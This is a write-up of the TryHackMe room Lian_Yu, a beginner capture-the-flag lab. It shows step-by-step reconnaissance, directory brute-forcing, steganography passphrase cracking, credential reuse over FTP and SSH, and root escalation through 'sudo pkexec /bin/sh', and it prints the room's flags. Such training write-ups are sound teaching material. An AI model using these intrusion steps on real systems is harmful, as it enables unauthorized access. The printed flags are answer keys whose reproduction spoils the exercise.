TryHackMe - Lian_Yu - Writeup

A beginner level security challenge

Nmap scan

root@ip-10-10-187-225:~# nmap -sCV -A 10.10.87.122

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-17 18:18 BST
Nmap scan report for ip-10-10-87-122.eu-west-1.compute.internal (10.10.87.122)
Host is up (0.00077s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.2
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
|   2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
|   256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_  256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (EdDSA)
80/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          43649/udp  status
|_  100024  1          45593/tcp  status
MAC Address: 02:3A:57:44:F8:BD (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms ip-10-10-87-122.eu-west-1.compute.internal (10.10.87.122)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds

Directory fuzzing

root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.87.122
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,cgi,css,js,py,conf,php,sh,html
[+] Timeout:        10s
===============================================================
2021/06/17 18:27:20 Starting gobuster
===============================================================
/index.html (Status: 200)
/island (Status: 301)
/server-status (Status: 403)
Progress: 194700 / 220561 (88.27%)

Couldn’t able to find the directory then fuzzed into /island directory

root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.87.122/island
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     cgi,css,js,py,conf,php,sh,txt,html
[+] Timeout:        10s
===============================================================
2021/06/17 18:59:14 Starting gobuster
===============================================================
/index.html (Status: 200)
/2100 (Status: 301)
<!DOCTYPE html>
<html>
<body>
<style>
 
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>


<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->


<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>

</body>
</html>

Hidden text is vigilante from the http://10.10.87.122/island and /island/2100/ source view I found a extension which is .ticket

<!DOCTYPE html>
<html>
<body>

<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>


<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how?   -->

</header>
</body>
</html>

add the extension in your extension list

root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf,ticket
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.87.122/island/2100
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,py,sh,txt,cgi,conf,ticket,php,css,js
[+] Timeout:        10s
===============================================================
2021/06/17 19:10:55 Starting gobuster
===============================================================
/index.html (Status: 200)
/green_arrow.ticket (Status: 200)

download the file green_arrow.ticket


This is just a token to get into Queen's Gambit(Ship)


RTy8yhBQdscX

Decode the password from base58 CyberChef

  • what is the FTP Password?

Answer: !#th3h00d

Use the hidden text from http://10.10.87.122/island use the name as ftp username vigilante and use the password we decoded.

root@ip-10-10-187-225:~# ftp 10.10.87.122
Connected to 10.10.87.122.
220 (vsFTPd 3.0.2)
Name (10.10.87.122:root): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png
-rw-r--r--    1 0        0          549924 May 05  2020 Queen's_Gambit.png
-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwx------    2 1000     1000         4096 May 01  2020 slade
drwxr-xr-x    2 1001     1001         4096 May 05  2020 vigilante
226 Directory send OK.

Get all the image file also there is another user which is slade. In 3 of the 2 image are fine but Leave_me_alone.png broken let’s use string to see what’s in there found nothing but random strings. Next one is aa.jpg

root@ip-10-10-187-225:~# steghide extract -sf aa.jpg
Enter passphrase: 
steghide: could not extract any data with that passphrase!

Interesting let’s use stegcracker to crack password.

root@ip-10-10-187-225:~# stegcracker aa.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)

Counting lines in wordlist..
Attacking file 'aa.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: password
Tried 4 passwords
Your file has been written to: aa.jpg.out
password

root@ip-10-10-187-225:~# steghide extract -sf aa.jpg
Enter passphrase: 
wrote extracted data to "ss.zip".

extract the ss.zip data

root@ip-10-10-68-68:~# unzip ss.zip
Archive:  ss.zip
  inflating: passwd.txt              
  inflating: shado 
root@ip-10-10-68-68:~# cat shado
M3tahuman

It could be SSH password.

  • what is the file name with SSH password?

Answer: shado

I tried to login with ftp username it didn’t worked with that password, Another user is slade so I used that username and the SSH password. It worked.

root@ip-10-10-68-68:~# ssh slade@10.10.87.122
slade@10.10.87.122's password: 
			      Way To SSH...
			  Loading.........Done.. 
		   Connecting To Lian_Yu  Happy Hacking

slade@LianYu:~$ ls
user.txt
slade@LianYu:~$ cat user.txt
THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}
			--Felicity Smoak
  • user.txt

Answer: THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N’T}

slade@LianYu:~$ sudo -l
[sudo] password for slade: 
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$ 

User slade can run /usr/bin/pkexec as root. Head out to GTFOBins pkexec

slade@LianYu:~$ sudo pkexec /bin/sh
# whoami
root
# cat /root/root.txt
                          Mission accomplished



You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE. 



THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}
									      --DEATHSTROKE

Let me know your comments about this machine :)
I will be available @twitter @User6825

Room link: Lian_Yu

Written on June 17, 2021